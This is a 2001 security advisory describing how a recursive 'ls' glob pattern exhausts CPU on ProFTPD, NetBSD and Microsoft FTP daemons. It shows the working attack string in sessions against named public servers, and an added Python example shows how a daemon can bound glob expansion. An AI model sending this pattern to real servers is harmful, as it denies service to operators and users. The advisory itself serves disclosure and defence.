Multiple FTP daemons vulnerable to denial of service

Published: 2001-03-16
Updated: 2001-03-16
Severity: Medium
Threat type: Remote denial of service
Bug class: Input validation error
Exploitation: Server mode

Affected systems
Proftpd

Detailed description
Multiple FTP daemons are vulnerable to denial of service. A flaw in how Proftpd handles the 'ls' command can be used to cause a denial of service:

$ ftp ftp.proftpd.org
....
Name (ftp.proftpd.org:j): ftp
....
230 Anonymous access granted, restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 Entering Passive Mode (216,10,40,219,4,111).
421 Service not available, remote server timed out.
Connection closed

This drives the server's CPU to 100%.

The NetBSD FTP daemon has the same problem:

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 EPRT command successful.
(long delay)
421 Service not available, remote server timed out.
Connection closed

The Microsoft FTP service is also affected, for example:

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
500 'EPSV': command not understood
227 Entering Passive Mode (207,46,133,140,4,223).
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
(very long wait)

- Publicfile refuses the command:

ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
227 =131,193,178,181,97,222
550 Sorry, I can't open that file: file does not exist.

Test code
See the description section.

Solution
None yet.

Related information
This information was published by Frank DENIS aka Jedi/Sector One <spam@jedi.claranet.fr>.
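The pattern in the sessions above is expensive because every '..' returns the daemon to the directory it has just enumerated, so each further '*' multiplies the work by that directory's fan-out. The Python below is an added illustration, not code from the advisory or from any of the daemons it names: it expands a pattern over a constructed in-memory tree while charging a work budget, the kind of limit a daemon can enforce while globbing an 'ls' argument, and estimates a pattern's worst-case cost from its wildcard count. The tree, the budget value and the function names are assumptions made for the example.

```python
import fnmatch

class GlobBudgetExceeded(Exception):
    pass

# Constructed sample tree (not from the advisory): dict = directory, None = file.
SAMPLE_TREE = {
    "pub":      {"docs": {"README": None, "NEWS": None}, "src": {"a.c": None}},
    "incoming": {"drop": {"upload.bin": None}},
    "etc":      {"motd": None},
}
PATHOLOGICAL = "*/../*/../*/../*/../*"   # shorter cousin of the advisory's pattern

def bounded_glob(root, pattern, budget=200):
    """Expand a shell-style pattern against `root`, charging one unit of
    `budget` per directory entry examined. Each '..' returns to the parent, so
    every '*' in '*/../*/..' re-enumerates the same directory once per match
    of the previous '*': the work grows as fanout ** number_of_stars."""
    segments = [s for s in pattern.split("/") if s]
    work, results = 0, []
    stack = [([("", root)], 0)]          # (ancestor chain, next segment index)
    while stack:
        chain, idx = stack.pop()
        if idx == len(segments):
            results.append("/".join(name for name, _ in chain[1:]))
            continue
        seg, node = segments[idx], chain[-1][1]
        if seg == ".":
            stack.append((chain, idx + 1))
        elif seg == "..":                 # stay at root if already there
            stack.append((chain[:-1] if len(chain) > 1 else chain, idx + 1))
        elif isinstance(node, dict):
            last = idx == len(segments) - 1
            for name, child in sorted(node.items()):
                work += 1
                if work > budget:
                    raise GlobBudgetExceeded(f"{work} entries examined")
                if fnmatch.fnmatchcase(name, seg) and (last or isinstance(child, dict)):
                    stack.append((chain + [(name, child)], idx + 1))
    return sorted(results)

def within_budget(root, pattern, budget=200):
    """True if `pattern` expands without exhausting `budget`."""
    try:
        bounded_glob(root, pattern, budget)
        return True
    except GlobBudgetExceeded:
        return False

def estimate_entries(pattern, fanout):
    """Worst-case entries examined when wildcard segments are separated by '..'."""
    stars = sum(1 for s in pattern.split("/") if any(c in s for c in "*?["))
    return sum(fanout ** k for k in range(1, stars + 1))
```

A real daemon would apply the same budget against the live filesystem rather than a dict, and reject the listing with an error instead of spending the CPU the advisory describes.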